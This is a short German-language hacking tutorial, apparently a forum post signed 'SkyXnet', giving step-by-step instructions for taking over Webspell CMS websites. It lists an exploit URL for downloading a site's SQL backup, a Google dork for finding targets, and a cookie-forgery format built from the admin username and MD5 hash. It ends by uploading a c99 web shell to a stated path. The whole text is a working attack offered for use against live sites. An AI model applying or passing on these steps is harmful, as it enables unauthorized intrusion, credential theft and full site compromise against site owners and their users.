hier ist net vonmir keine lust zu schreiben <.<
Exploit:
[PATH]/admin/database.php?action=write&userID=1
Google-Dork: inurl:"index.php?site=lostpassword"
Cookie Fake: ws_auth= USERNAME %3A HASH
Find Files: "index.php?site=files"
Shell Path /downloads/c99.php
__________________________________________________ ___________________________________
Step 1:
Sucht euch eine Webspell seite mit dem oben stehenden Google-Dork ich hab schon eine
Step 2:
Ladet euch ein SQL-Backup runter mit dem oben stehenden Exploit
Step 3:
Sucht nach dem Administrator Usernamen und MD5 Hash
Step 4: Cracked den Hash, oder macht einen Cookie-Fake mit dem oben stehenden Befehlen
Step 5:
Schaut nach ob es schon File-Kategorien gibt, wenn nicht erstellt eine
Step 6:
Ladet die C99-Shell hoch, und gibt den Path zur shell an (oben steht er^^)
File created. n1 ^^
Step 7:
Wenn die Shell durchgekommen, könnt ihr machen was ihr wollt...sie ist durch ^^
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Ende ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tutorial By SkyXnet